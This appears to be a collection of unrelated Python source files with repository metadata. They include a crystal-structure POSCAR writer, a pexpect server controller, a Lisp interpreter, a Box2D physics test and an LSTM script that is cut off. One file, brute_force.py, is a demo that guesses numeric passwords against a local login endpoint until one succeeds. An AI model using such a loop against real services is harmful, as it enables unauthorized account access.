# for each structure write the vasp POSCAR
for structure in structure_data:
# space_data is a dictionary containing the spacial data for
# the structure
space_data = _map_enumStr_to_real_space(system,structure,args["mink"])
space_data["aBas"] = _cartesian2direct(space_data["sLV"],
space_data["aBas"],system["eps"])
_write_POSCAR(system,space_data,structure,args)
def examples():
"""Print some examples on how to use this python version of the code."""
script = "makeStr: Makes a vasp style POSCAR for the desired system."
explain = ("For all the examples bellow it is assumed you have already "
"run the enumeration code and produced an struct_enum.out style file.")
contents = [("Make a single POSCAR file",
"To make a POSCAR file for a specific structure listed in the "
"`struct_enum.out` style file you will need to identify the structure \n number "
"(the first number of each row in the file) for the structure you want "
". For example to make a POSCAR for structure number 10 \n from an `struct_enum.out` "
"file.","makeStr.py 10 \n"),
("Make multilpe POSCARS at once",
"To make multiple POSCARS for a range of values in the `struct_enum.out` style "
"file simply list the starting and ending structure numbers \n of the range. "
"To make POSCARS for every structure in the output file use the word `all`.",
"makeStr.py 10 20 \n makeStr.py all \n"),
("Find the lattice parameter for the system",
"To have makeStr.py predict the lattice parameter for the system using "
"Vegard's Law use the -species option followed by a space \n separated list "
"of the elements in the system.","makeStr.py 10 -species Al Cu \n"),
("Include displacements in POSCAR",
"If `arrows` (displacement directions) were included in the enumeration "
"then it is possible to displace them off the lattice points \n when making the "
"POSCARS using the -displace option followed by the displacement amount "
"expressed in terms of the lattice parameter. \n In other words if `a` is "
"the lattice parameter and the atoms were to be displaced by `a/2` then "
"the command would be:","makeStr.py 10 -displace 0.5 \n"),
("Make displacements have different lengths in POSCAR",
"If `arrows` were included in the model and the `-displace` flag is being "
"used it is possible to 'rattle' the displacements so that \n they are not all "
"the same length. Using the `-rattle` option applies a random distribution "
"to the displacements with the larges change \n in the displacements specified "
"by the user as a fraction of the displacement given. So if a displacement of "
"0.5 was given and the \n displacements were to be randomized by 1/4 of that total "
"displacement the the command would be:",
"makeStr.py 10 -displace 0.5 -rattle 0.25")]
required = ("REQUIRED: A `struct_enum.out` file.")
output = ("RETURNS: A vasp style POSCAR labeled vasp.* where the `*` is replaced "
"with the structure number for the `struct_enum.out` file.")
details = ("")
outputfmt = ("")
example(script, explain, contents, required, output, outputfmt, details)
script_options = {
"structures": dict(nargs="+",
help=("The desired structure numbers from the struct_enum.out file. This "
"can be either a single value or a desired range indicated by "
"the starting and stopping structure numbers.")),
"-displace": dict(default=0.0, type=float,
help=("The displacement amount for the arrows in units of the lattice "
"parameter. Default is 0.")),
"-input": dict(default="struct_enum.out",type=str,
help=("Override the default 'struct_enum.out' file name.")),
"-mink": dict(default="t", choices=["t","f"],
help=("Sets flag to perform minkowski reduction of the basis (T/F)."
" Default is True.")),
"-species": dict(default=None, nargs="+",type=str,
help=("Specify the atomic species present in the system.")),
"-outfile": dict(default="vasp.{}",type=str,
help=("Override the default output file names: 'vasp.{structure#}'"
"for the structures.")),
"-rattle": dict(default=0.0, type=float,
help=("Randomizes the positions of the atoms in the POSCAR by no "
"more than the fraction of the displacement provided."))
}
"""dict: default command-line arguments and their
:meth:`argparse.ArgumentParser.add_argument` keyword arguments.
"""
def _parser_options():
"""Parses the options and arguments from the command line."""
#We have two options: get some of the details from the config file,
import argparse
pdescr = "POSCAR contstruction."
parser = argparse.ArgumentParser(parents=[bparser], description=pdescr)
for arg, options in script_options.items():
parser.add_argument(arg, **options)
args = exhandler(examples, parser)
if args is None:
return
return args #pragma: no cover
def run(args):
"""Generates the vasp output file for the desired structure.
"""
if args == None:
exit()
if args["structures"] != None :
if not RepresentsInt(args["structures"][0]) and args["structures"][0].lower() == "all":
args["structures"] = None
elif len(args["structures"]) == 1 and RepresentsInt(args["structures"][0]):
args["structures"] = [int(args["structures"][0])]
elif len(args["structures"]) == 2:
args["structures"] = list(range(int(args["structures"][0]),
int(args["structures"][1])+1))
else:
raise ValueError("Please enter a single structure number, two structures that "
"indicate the first and last structure to be used in the input "
"file, or all. The values {} don't match this "
"format.".format(args["structures"]))
else:
raise ValueError("Please enter a single structure number, two structures that "
"indicate the first and last structure to be used in the input "
"file, or all. The values {} don't match this "
"format.".format(args["structures"]))
_make_structures(args)
if __name__ == '__main__':
run(_parser_options())
| [
"wiley.s.morgan@gmail.com"
] | wiley.s.morgan@gmail.com |
4421fe3ac2588394e9b7db0d0787a3510f2dcc4d | b9677cd37d6f0ea93c44177795a7b8a072457260 | /lib/libreflow/reflow.py | ba74c3e38e176bc54914181bec3f879bd7947838 | [] | no_license | harrytan007/TestStation | c691ee86428070ffa929e4cc2580b85a72536969 | 56bd2eb3dd6062fcf2ed263c7d7029478c5aeed5 | refs/heads/master | 2016-09-03T00:38:22.367800 | 2014-07-30T08:30:11 | 2014-07-30T08:31:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,591 | py | #coding=utf-8
#
# Copyright (C) 2013-2014 Harry Tan <tanhy@sugon.com>
#
# This file is part of libserv.
import pexpect
import re
import string
from test_station.libserv.serv import Serv
from test_station.err import EXCEPTION
from test_station.logging.logger import log
from test_station.resource import Resource
from test_station import gl
class Reflow(Serv, Resource):
def __init__(self, node):
Serv.__init__(self, None, None)
Resource.__init__(self, node.get("name"), "reflow")
self.connect = []
self.__parse(node)
def __parse(self, node):
self.type = node.findtext("type")
self.ip = node.findtext("ip")
self.password = node.findtext("passwd")
self.dir = node.findtext("dir")
self.if_ip = node.findtext("if_ip")
self.if_mac = node.findtext("if_mac")
self.if_name = node.findtext("if_name")
self.if_port = node.findtext("if_port")
def login(self):
self.remoteLogin()
def __vbReflowGet(self, keyword):
ss = self.child
ss.sendline('/usr/local/sbin/reflow_tool -p')
ss.expect('/usr/local/sbin/reflow_tool -p(.*?)packets recv:(.*?)#', 10)
m = re.match(r".*packets recv\:(\d+)\s+reflow\:(\d+)", ss.after.replace('\r\n', ''))
if keyword is 'recv':
ret = string.atoi(m.group(1))
elif keyword is 'send':
ret = string.atoi(m.group(2))
return ret
def __netfirmReflowGet(self, keyword):
ss = self.child
ss.sendline("%s/reflow_rule find %s"%(self.dir.rstrip("/"), self.if_ip))
index = ss.expect(["recv:<(.*?)> reflow:<(.*?)>", r"find %s\r\n\x1b]0;root@localhost:~\x07"%self.if_ip], 5)
if index == 0:
m = re.match(r".*recv\:\<(\d+)\>\s+reflow\:\<(\d+)\>", ss.after.replace('\r\n', ''))
if keyword is "recv":
ret = string.atoi(m.group(1))
elif keyword is "send":
ret = string.atoi(m.group(2))
elif index == 1:
ret = 0
return ret
def reflowGet(self, keyword):
"""功能:获取回流计数
输入:recv(收到包数),send(回流包数)
输出:包数
"""
try:
if keyword in ["recv", "send"]:
if self.type == "vb":
ret = self.__vbReflowGet(keyword)
elif self.type == "netfirm":
ret = self.__netfirmReflowGet(keyword)
log(0, "Get %s counts of reflow server(%s): %d" % (keyword, self.if_ip, ret))
return ret
else:
log(2, "Unmatched keyword of getting reflow")
raise EXCEPTION(1, "Get reflow counts: unmatched keyword of getting reflow")
except pexpect.TIMEOUT:
log(2, "Get %s counts of reflow server(%s): time out" % (keyword, self.if_ip))
raise EXCEPTION(2, "Get %s counts of reflow server(%s): time out" % (keyword, self.if_ip))
def __vbReflowClear(self):
ss = self.child
ss.sendline('/usr/local/sbin/reflow_tool -c')
ss.expect('/usr/local/sbin/reflow_tool -c\r\n(.*?)', 5)
def __netfirmReflowClear(self):
ss = self.child
ss.sendline("%s/reflow_rule clear %s"%(self.dir.rstrip("/"), self.if_ip))
ss.expect("#", 5)
def reflowClear(self):
try:
if self.type == "vb":
self.__vbReflowClear()
elif self.type == "netfirm":
self.__netfirmReflowClear()
log(0, "Clear reflow(%s) counts"%self.if_ip)
except pexpect.TIMEOUT:
log(2, "Clear reflow(%s) counts: time out"%self.if_ip)
raise EXCEPTION(2, "Clear reflow(%s) counts: time out"%self.if_ip)
def setIfState(self, state):
ss = self.child
action = {"up":"add", "down":"del"}
try:
if state in ["up", "down"]:
if self.type == "netfirm":
ss.sendline("%s/reflow_rule %s \"%s;%s;%s;\""%(self.dir.rstrip("/"), action[state], self.if_ip, self.if_mac, self.if_port))
ss.expect("#", 5)
log(0, "Set interface(%s) state: %s"%(self.if_ip, state))
else:
log(2, "Unmatched state of setting interface state")
raise EXCEPTION(1, "Unmatched state of setting interface state")
except pexpect.TIMEOUT:
log(2, "Set interface(%s) state: time out"%self.if_ip)
raise EXCEPTION(2, "Set interface(%s) state: time out"%self.if_ip)
| [
"harrytan007@163.com"
] | harrytan007@163.com |
ac1bf399a248cee21f69196d677399209d6ab7b1 | fa68fea5de9eeddde02d452197db592fcda1491a | /gps_cad/build/gazebo-pkgs/gazebo_test_tools/catkin_generated/pkg.develspace.context.pc.py | f456774e9270a884f35045859cc5aa970e799dd2 | [
"BSD-2-Clause"
] | permissive | iclavera/gps_cad_starts | 42763ffc4b589fa8b9865fb433173664ee75ff24 | 1375f8badbcbe2fe5f10c6f36aa104bf4ef74a2e | refs/heads/master | 2021-06-30T19:37:40.212162 | 2017-09-12T22:30:18 | 2017-09-12T22:30:18 | 103,326,745 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 707 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/melissachien/new_gps/devel/include;/home/melissachien/new_gps/src/gazebo-pkgs/gazebo_test_tools/include".split(';') if "/home/melissachien/new_gps/devel/include;/home/melissachien/new_gps/src/gazebo-pkgs/gazebo_test_tools/include" != "" else []
PROJECT_CATKIN_DEPENDS = "object_msgs;gazebo_ros;geometry_msgs;roscpp;std_msgs;message_runtime".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-lgazebo_test_tools".split(';') if "-lgazebo_test_tools" != "" else []
PROJECT_NAME = "gazebo_test_tools"
PROJECT_SPACE_DIR = "/home/melissachien/new_gps/devel"
PROJECT_VERSION = "1.0.1"
| [
"florensacc@berkeley.edu"
] | florensacc@berkeley.edu |
5b6e04be6a0f4cf577fdb163d2ff6914b318edf7 | 2cad70f628f2fa1f9829fe5349536b00b557cbb5 | /interpreter.py | 9b3ebd7d6d4612557c257e71ec7616bf5855f590 | [] | no_license | krzysztof-magosa/lisper | e34b942eb45a9f46fc44d9dcd7d3ef3991cd7205 | 34ab2829671464046137b77be59bc12ae42d1396 | refs/heads/master | 2021-01-20T08:54:21.975155 | 2017-05-08T17:07:49 | 2017-05-08T17:07:49 | 90,199,363 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,840 | py | from __future__ import print_function
from __future__ import division
import sys
import syntax
from lisp import *
def sprintf(format, *values):
return (format % values)
class Scope(object):
def __init__(self, parameters=[], arguments=[], outer=None):
self.data = dict()
self.data.update(zip(parameters, arguments))
self.outer = outer
def find(self, name):
if name in self.data:
return self
elif self.outer is None:
raise RuntimeError(
"Attempt to use not existing variable '{}'.".format(name)
)
else:
return self.outer.find(name)
def get(self, name):
return self.find(name).data[name]
def define(self, name, value):
# Creates new variable.
self.data[name] = value
def set(self, name, value):
# Changes existing variable or creates new variable.
try:
self.find(name).data[name] = value
except:
self.define(name, value)
class Macro(Procedure):
pass
def scope_init(scope):
scope.define(c.NIL, c.V_NIL)
scope.define(c.TRUE, c.V_TRUE)
# scope.define('abs', abs)
# scope.define('begin', lambda *x: x[-1])
# scope.define('integer?', lambda x: is_integer(x))
# scope.define('float?', lambda x: is_float(x))
# scope.define('string?', lambda x: is_string(x))
# scope.define('symbol?', lambda x: is_symbol(x))
# scope.define('list?', lambda x: is_list(x))
class Interpreter(object):
BUILTINS = {
'if': 'builtin_if',
# 'eq': 'builtin_eq',
'equal': 'builtin_equal',
c.LAMBDA: 'builtin_lambda',
'\\': 'builtin_lambda',
'macro': 'builtin_macro',
'quasiquote': 'builtin_quasiquote',
'define': 'builtin_define',
'set!': 'builtin_set_bang',
'quote': 'builtin_quote',
'print': 'builtin_print',
'prin1': 'builtin_prin1',
'while': 'builtin_while',
'typeof': 'builtin_typeof',
'format': 'builtin_format',
'cons': 'builtin_cons',
'null': 'builtin_is_nil',
'join': 'builtin_join',
'list': 'builtin_list',
'car': 'builtin_car',
'cdr': 'builtin_cdr',
'len': 'builtin_len',
'call': 'builtin_call',
'=': 'builtin_math_eq',
'<': 'builtin_math_lt',
'<=': 'builtin_math_le',
'>': 'builtin_math_gt',
'>=': 'builtin_math_ge',
'+': 'builtin_math_add',
'-': 'builtin_math_sub',
'/': 'builtin_math_div',
'*': 'builtin_math_mul',
'mod': 'builtin_math_mod',
'min': 'builtin_math_min',
'max': 'builtin_math_max',
'begin': 'builtin_begin'
}
def __init__(self, parser=syntax.parser, scope_init=scope_init):
self.parser = parser
self.scope = Scope()
scope_init(self.scope)
def interpret(self, code):
lisp = self.parser.parse(code)
# print(lisp)
return self.eval_lisp(lisp, scope=self.scope)
def assert_nargs(self, context, args, expected):
got = len(args)
if got != expected:
raise RuntimeError(
"{}: expected {} argument(s), got {}.".format(
context,
expected,
got
)
)
def assert_rargs(self, context, args, minimum, maximum):
got = len(args)
if got < minimum or got > maximum:
raise RuntimeError(
"{}: expected {}-{} arguments, got {}.".format(
context,
minimum,
maximum,
got
)
)
def assert_type(self, context, args, n, expected):
if not isinstance(expected, list):
expected = [expected]
got = typeof(args[n])
if got not in expected:
raise RuntimeError(
"{}: expected {} argument to be {}, got {}.".format(
context,
n,
"/".join(expected),
got
)
)
def assert_type_eval(self, context, value, n, expected):
if not isinstance(expected, list):
expected = [expected]
got = typeof(value)
if got not in expected:
raise RuntimeError(
"{}: expected {} argument to be evaluated into {}, got {}.".format(
context,
n,
"/".join(expected),
got
)
)
# def is_nil(self, x):
# if isinstance(x, syntax.Symbol) and x == "nil":
# return True
# elif x == []:
# return True
#
# return False
def builtin_cons(self, scope, args):
head = self.eval_lisp(args[0], scope)
rest = self.eval_lisp(args[1], scope)
if is_nil(head):
head = []
if is_nil(rest):
rest = []
if not isinstance(rest, list):
rest = [rest]
x = [head] + rest
return x
def builtin_is_nil(self, scope, args):
var = self.eval_lisp(args[0], scope)
# print(var.__class__.__name__)
# print(is_nil(var))
return c.V_TRUE if is_nil(var) else c.V_NIL
def builtin_join(self, scope, args):
args = [self.eval_lisp(x, scope) for x in args]
return sum(args, [])
def builtin_list(self, scope, args):
return [self.eval_lisp(x, scope) for x in args]
def builtin_if(self, scope, args):
self.assert_rargs("if", args, 2, 3)
test_result = self.eval_lisp(args[0], scope)
# self.assert_type_eval("if", test_result, 0, c.T_BOOLEAN)
if is_true(test_result):
clause = args[1]
elif len(args) == 3:
clause = args[2]
else:
clause = c.V_NIL
return self.eval_lisp(clause, scope)
# def builtin_eq(self, scope, args):
# a = self.eval_lisp(args[0], scope)
# b = self.eval_lisp(args[0], scope)
# print(id(a))
# print(id(b))
# print(a.__class__.__name__)
# return c.V_TRUE if id(a) == id(b) else c.V_NIL
def builtin_equal(self, scope, args):
a = self.eval_lisp(args[0], scope)
b = self.eval_lisp(args[0], scope)
return c.V_TRUE if a == b else c.V_NIL
def builtin_typeof(self, scope, args):
self.assert_nargs("typeof", args, 1)
return typeof(self.eval_lisp(args[0], scope))
def builtin_define(self, scope, args):
# print(args)
self.assert_nargs("define", args, 2)
name = args[0] # self.eval_lisp(args[0], scope)
value = self.eval_lisp(args[1], scope)
self.assert_type_eval("define", name, 0, c.T_SYMBOL)
scope.define(name, value)
def builtin_set_bang(self, scope, args):
self.assert_nargs("set!", args, 2)
name = args[0] # self.eval_lisp(args[0], scope)
value = self.eval_lisp(args[1], scope)
self.assert_type_eval("set!", name, 0, c.T_SYMBOL)
scope.set(name, value)
def builtin_format(self, scope, args):
return sprintf(args[0], *args[1:])
def builtin_quote(self, scope, args):
return args[0]
def builtin_lambda(self, scope, args):
(parameters, body) = args
return Procedure(self, parameters, body, scope)
def builtin_macro(self, scope, args):
(parameters, body) = args
return Macro(self, parameters, body, scope)
def is_pair(self, x):
return x != [] and isinstance(x, list)
def expand_quasiquote(self, x):
if not self.is_pair(x):
return [Symbol('quote'), x]
elif is_symbol(x[0]) and x[0] == 'unquote':
return x[1]
else:
return [
Symbol('cons'),
self.expand_quasiquote(x[0]),
self.expand_quasiquote(x[1:])
]
def builtin_quasiquote(self, scope, args):
y = self.expand_quasiquote(args[0])
y = self.eval_lisp(y, scope)
return y
def builtin_print(self, scope, args):
self.assert_nargs("print", args, 1)
obj = self.eval_lisp(args[0], scope=scope)
print(to_lisp(obj))
def builtin_prin1(self, scope, args):
self.assert_nargs("prin1", args, 1)
print(to_lisp(self.eval_lisp(args[0], scope=scope)), end='')
def builtin_while(self, scope, args):
(cond, body) = args
while self.eval_lisp(cond, scope=scope):
self.eval_lisp(body, scope=scope)
def builtin_car(self, scope, args):
self.assert_nargs("car", args, 1)
args = self.eval_all(args, scope)
self.assert_type_eval("car", args[0], 0, c.T_LIST)
return args[0][0]
def builtin_cdr(self, scope, args):
self.assert_nargs("cdr", args, 1)
args = self.eval_all(args, scope)
self.assert_type_eval("cdr", args[0], 0, c.T_LIST)
return args[0][1:]
def builtin_len(self, scope, args):
self.assert_nargs("len", args, 1)
args = self.eval_all(args, scope)
self.assert_type_eval("len", args[0], 0, [c.T_LIST, c.T_NIL])
return len(args[0])
def builtin_call(self, scope, args):
name = self.eval_lisp(args[0], scope)
# args = self.eval_all(args[1:], scope)
return self.eval_lisp([name] + args[1:], scope)
def builtin_math_eq(self, scope, args):
self.assert_rargs("=", args, 1, sys.maxint)
args = self.eval_all(args, scope)
for i in range(len(args)):
self.assert_type_eval("=", args[i], i, [c.T_INTEGER, c.T_FLOAT])
for x in args[1:]:
if not args[0] == x:
return c.V_NIL
return c.V_TRUE
def builtin_math_lt(self, scope, args):
self.assert_rargs("<", args, 1, sys.maxint)
args = self.eval_all(args, scope)
for i in range(len(args)):
self.assert_type_eval("<", args[i], i, [c.T_INTEGER, c.T_FLOAT])
for x in args[1:]:
if not args[0] < x:
return c.V_NIL
return c.V_TRUE
def builtin_math_le(self, scope, args):
self.assert_rargs("<=", args, 1, sys.maxint)
args = self.eval_all(args, scope)
for i in range(len(args)):
self.assert_type_eval("<=", args[i], i, [c.T_INTEGER, c.T_FLOAT])
for x in args[1:]:
if not args[0] <= x:
return c.V_NIL
return c.V_TRUE
def builtin_math_gt(self, scope, args):
self.assert_rargs(">", args, 1, sys.maxint)
args = self.eval_all(args, scope)
for i in range(len(args)):
self.assert_type_eval(">", args[i], i, [c.T_INTEGER, c.T_FLOAT])
for x in args[1:]:
if not args[0] > x:
return c.V_NIL
return c.V_TRUE
def builtin_math_ge(self, scope, args):
self.assert_rargs(">=", args, 1, sys.maxint)
args = self.eval_all(args, scope)
for i in range(len(args)):
self.assert_type_eval(">=", args[i], i, [c.T_INTEGER, c.T_FLOAT])
for x in args[1:]:
if not args[0] >= x:
return c.V_NIL
return c.V_TRUE
def builtin_math_add(self, scope, args):
self.assert_rargs("+", args, 1, sys.maxint)
args = self.eval_all(args, scope)
for i in range(len(args)):
self.assert_type_eval("+", args[i], i, [c.T_INTEGER, c.T_FLOAT])
result = args[0]
for x in args[1:]:
result += x
return result
def builtin_math_sub(self, scope, args):
self.assert_rargs("-", args, 1, sys.maxint)
args = self.eval_all(args, scope)
for i in range(len(args)):
self.assert_type_eval("-", args[i], i, [c.T_INTEGER, c.T_FLOAT])
result = args[0]
for x in args[1:]:
result -= x
return result
def builtin_math_div(self, scope, args):
self.assert_rargs("/", args, 1, sys.maxint)
args = self.eval_all(args, scope)
for i in range(len(args)):
self.assert_type_eval("/", args[i], i, [c.T_INTEGER, c.T_FLOAT])
result = args[0]
for x in args[1:]:
result /= x
return result
def builtin_math_mul(self, scope, args):
self.assert_rargs("*", args, 1, sys.maxint)
args = self.eval_all(args, scope)
for i in range(len(args)):
self.assert_type_eval("*", args[i], i, [c.T_INTEGER, c.T_FLOAT])
result = args[0]
for x in args[1:]:
result *= x
return result
def builtin_math_mod(self, scope, args):
self.assert_nargs("mod", args, 2)
args = self.eval_all(args, scope)
for i in range(len(args)):
self.assert_type_eval("mod", args[i], i, [c.T_INTEGER, c.T_FLOAT])
return args[0] % args[1]
def builtin_math_min(self, scope, args):
self.assert_rargs("min", args, 1, sys.maxint)
args = self.eval_all(args, scope)
for i in range(len(args)):
self.assert_type_eval("min", args[i], i, [c.T_INTEGER, c.T_FLOAT])
return min(args)
def builtin_math_max(self, scope, args):
self.assert_rargs("max", args, 1, sys.maxint)
args = self.eval_all(args, scope)
for i in range(len(args)):
self.assert_type_eval("max", args[i], i, [c.T_INTEGER, c.T_FLOAT])
return max(args)
def builtin_begin(self, scope, args):
result = c.V_NIL
for x in args:
result = self.eval_lisp(x, scope)
return result
def eval_all(self, args, scope):
return [self.eval_lisp(x, scope) for x in args]
def eval_lisp(self, item, scope):
print("Running: {}".format(to_lisp(item)))
if isinstance(item, syntax.Symbol):
return scope.get(item)
elif not isinstance(item, list) or len(item) == 0:
return item
elif item[0] in self.BUILTINS:
func = getattr(self, self.BUILTINS[item[0]])
return func(scope, item[1:])
else:
procedure = self.eval_lisp(item[0], scope=scope)
if isinstance(procedure, Macro):
arguments = item[1:]
procedure.outer_scope = scope
lisp = procedure(*arguments)
return self.eval_lisp(lisp, scope)
elif isinstance(procedure, Procedure):
arguments = [self.eval_lisp(arg, scope=scope) for arg in item[1:]]
return procedure(*arguments)
else:
print(item)
raise RuntimeError("Not callable")
| [
"krzysztof@magosa.pl"
] | krzysztof@magosa.pl |
ae2a22cc0b1cc5579211830f6a6aea5b8a5a3389 | 81cdfbe8258dac8fd0e150fcc9faed6b32ac7aeb | /brute_force.py | 30b31428b1d3882a186a84a4afb7b0a6af51642d | [] | no_license | nabinkhadka/attack-demo | f7299e18bc8d261509926593820df75cb3aad8b1 | 439cb05cf0428d0a872cdc6e2e09166d1329cf69 | refs/heads/master | 2020-04-24T10:13:00.913199 | 2019-02-21T14:27:18 | 2019-02-21T14:27:18 | 171,885,919 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 396 | py | import json
import string
from requests import post as POST
URL = 'http://127.0.0.1:5000/login'
if __name__ == '__main__':
success = False
guess_password = 0
while not success:
response = POST(URL, data={'username': 'Nabin', 'password': str(guess_password)})
success = json.loads(response.text).get('success')
if success:
print(f'Password is {guess_password}')
guess_password += 1 | [
"noreply@github.com"
] | noreply@github.com |
336dc156e43a58de4bf5f3dfc9056d7fa904aff8 | 4f8ad548979f2b8a600b82ce0933f32733a45b9b | /testbed/test_ContactCallbackTest.py | b30924ccb3477f443aa912c1baf1000332939980 | [] | no_license | bxie1/PhysicsBalance | ff79b8bad161f561b243eaae4201bd983cb50c63 | 1bb160f1310e5bca88929d3d5cc55f568a826bb2 | refs/heads/master | 2021-03-12T20:31:56.493496 | 2014-04-16T04:05:13 | 2014-04-16T04:05:13 | 18,660,031 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,370 | py | #!/usr/bin/python
#
# C++ version Copyright (c) 2006-2007 Erin Catto http://www.gphysics.com
# Python version Copyright (c) 2008 kne / sirkne at gmail dot com
#
# Implemented using the pybox2d SWIG interface for Box2D (pybox2d.googlecode.com)
#
# This software is provided 'as-is', without any express or implied
# warranty. In no event will the authors be held liable for any damages
# arising from the use of this software.
# Permission is granted to anyone to use this software for any purpose,
# including commercial applications, and to alter it and redistribute it
# freely, subject to the following restrictions:
# 1. The origin of this software must not be misrepresented; you must not
# claim that you wrote the original software. If you use this software
# in a product, an acknowledgment in the product documentation would be
# appreciated but is not required.
# 2. Altered source versions must be plainly marked as such, and must not be
# misrepresented as being the original software.
# 3. This notice may not be removed or altered from any source distribution.
from test_main import *
from test_main import fwContactTypes
import math
import pprint
pp = pprint.PrettyPrinter(indent=4)
# Contributed by caspin (C++ version)
class ContactCallbackTest (Framework):
name="ContactCallbackTest"
ball=None
bullet=None
ball_shape=None
_pickle_vars = ['ball', 'bullet', 'ball_shape']
def __init__(self):
super(ContactCallbackTest, self).__init__()
groundBody = self.world.GetGroundBody()
sd=box2d.b2PolygonDef()
sd.friction = 0
sd.vertices = [(10.0, 10.0), (9.0, 7.0), (10.0, 0.0)]
sd.userData = 1
groundBody.CreateShape(sd)
sd.vertices = [(9.0, 7.0), (8.0, 0.0), (10.0, 0.0)]
sd.userData = 2
groundBody.CreateShape(sd)
sd.vertices = [(9.0, 7.0), (8.0, 5.0), (8.0, 0.0)]
sd.userData = 3
groundBody.CreateShape(sd)
sd.vertices = [(8.0, 5.0), (7.0, 4.0), (8.0, 0.0)]
sd.userData = 4
groundBody.CreateShape(sd)
sd.vertices = [(7.0, 4.0), (5.0, 0.0), (8.0, 0.0)]
sd.userData = 5
groundBody.CreateShape(sd)
sd.vertices = [(7.0, 4.0), (5.0, 3.0), (5.0, 0.0)]
sd.userData = 6
groundBody.CreateShape(sd)
sd.vertices = [(5.0, 3.0), (2.0, 2.0), (5.0, 0.0)]
sd.userData = 7
groundBody.CreateShape(sd)
sd.vertices = [(2.0, 2.0), (0.0, 0.0), (5.0, 0.0)]
sd.userData = 8
groundBody.CreateShape(sd)
sd.vertices = [(2.0, 2.0), (-2.0, 2.0), (0.0, 0.0)]
sd.userData = 9
groundBody.CreateShape(sd)
sd.vertices = [(-5.0, 0.0), (0.0, 0.0), (-2.0, 2.0)]
sd.userData = 10
groundBody.CreateShape(sd)
sd.vertices = [(-5.0, 0.0), (-2.0, 2.0), (-5.0, 3.0)]
sd.userData = 11
groundBody.CreateShape(sd)
sd.vertices = [(-5.0, 0.0), (-5.0, 3.0), (-7.0, 4.0)]
sd.userData = 12
groundBody.CreateShape(sd)
sd.vertices = [(-8.0, 0.0), (-5.0, 0.0), (-7.0, 4.0)]
sd.userData = 13
groundBody.CreateShape(sd)
sd.vertices = [(-8.0, 0.0), (-7.0, 4.0), (-8.0, 5.0)]
sd.userData = 14
groundBody.CreateShape(sd)
sd.vertices = [(-8.0, 0.0), (-8.0, 5.0), (-9.0, 7.0)]
sd.userData = 15
groundBody.CreateShape(sd)
sd.vertices = [(-10.0, 0.0), (-8.0, 0.0), (-9.0, 7.0)]
sd.userData = 16
groundBody.CreateShape(sd)
sd.vertices = [(-10.0, 0.0), (-9.0, 7.0), (-10.0, 10.0)]
sd.userData = 17
groundBody.CreateShape(sd)
sd.SetAsBox(.5,6,(10.5,6),0)
groundBody.CreateShape(sd)
sd.SetAsBox(.5,6,(-10.5,6),0)
groundBody.CreateShape(sd)
bd=box2d.b2BodyDef()
bd.position=(9.5,60)
self.ball = self.world.CreateBody( bd )
cd=box2d.b2PolygonDef()
cd.vertexCount = 8
w = 1.0
b = w / (2.0 + math.sqrt(2.0))
s = math.sqrt(2.0) * b
cd.vertices = [( 0.5 * s, 0.0),
( 0.5 * w, b),
( 0.5 * w, b + s),
( 0.5 * s, w),
(-0.5 * s, w),
(-0.5 * w, b + s),
(-0.5 * w, b),
(-0.5 * s, 0.0) ]
cd.density = 1.0
cd.userData = 'BALL'
self.ball_shape = self.ball.CreateShape(cd)
self.ball.SetMassFromShapes()
def Step(self, settings):
strings = []
name_dict = { fwContactTypes.contactAdded : "added",
fwContactTypes.contactRemoved : "removed",
fwContactTypes.contactPersisted : "persisted" }
strings = ["%s: %s, %s (%s)" % (name_dict[point.state], point.shape1.userData, point.shape2.userData, point.id.key)
for point in self.points]
if len(strings) > 15:
strings = strings[:14]
for string in strings:
self.DrawStringCR(string)
super(ContactCallbackTest, self).Step(settings)
if __name__=="__main__":
main(ContactCallbackTest)
| [
"bxie1@cs.swarthmore.edu"
] | bxie1@cs.swarthmore.edu |
7004499ea3b151a6bcf2d8ed421b35095129113a | 1b10fceb1c57e86424da38305baff903801644b4 | /docs/skeletons/test/Amazon_cost_test.py | b8fa78a13fb992cdbe54987cc3907780423c1702 | [
"MIT"
] | permissive | ramyasaimullapudi/ItemStockTracker | 82a07c0b3d0e8e8516ef206b57d3520fa411a542 | db958af9063cfad653115c727a94fd6e0957ea90 | refs/heads/main | 2023-04-11T07:17:40.854706 | 2021-11-04T21:52:43 | 2021-11-04T21:52:43 | 416,888,118 | 0 | 3 | MIT | 2021-12-04T04:39:52 | 2021-10-13T20:25:59 | Python | UTF-8 | Python | false | false | 223 | py | def test_check_cost():
"""
Tests if the cost value is received correctly for each of the 5 stock
status conditions (In Stock, Order Soon, Out of Stock, In Stock Soon,
Invalid URL) on www.amazon.com.
"""
| [
"krishnasaurabh123@gmail.com"
] | krishnasaurabh123@gmail.com |
828980f9b3d55d7772d7fcd0e4a3fa217dda1d18 | 83da60453633c40bb0ad26fb1c231d316b7fbb6d | /code_examples/sine_generator/lstm_minibatchgd.py | b6262e92d8ad10fe78714f1d1ec170cafaa0aba8 | [] | no_license | Hunterhal/pytorch_study | 3d93aacfa2fae2dc66fd468a55ec4f49f7ec22a2 | cd7eaa49f0a364b116dc2559a2fd208277ca396a | refs/heads/master | 2020-08-18T08:40:36.029590 | 2020-05-26T13:28:12 | 2020-05-26T13:28:12 | 215,770,601 | 4 | 1 | null | 2019-10-18T07:52:13 | 2019-10-17T10:58:22 | null | UTF-8 | Python | false | false | 3,772 | py | import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import numpy as np
import random
import matplotlib.pyplot as plt
import models
import time
#Signal variables
sampling_freq = 200
signal_duration = 2
total_samples = sampling_freq * signal_duration
#Learning variables
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
max_epoch = 1000
test_number = 15
learning_rate = 1e-3
batch_size = 16
seq_length = 5
# LSTM parameters
num_layers = 3
size_hidden = 4
size_in = 1
size_out = size_in
x = torch.linspace(0, signal_duration * 2 * np.pi, total_samples, device=device)
y_gt = torch.sin(x)
y_noisy = y_gt + 0.05*torch.randn(x.size(), device=device)
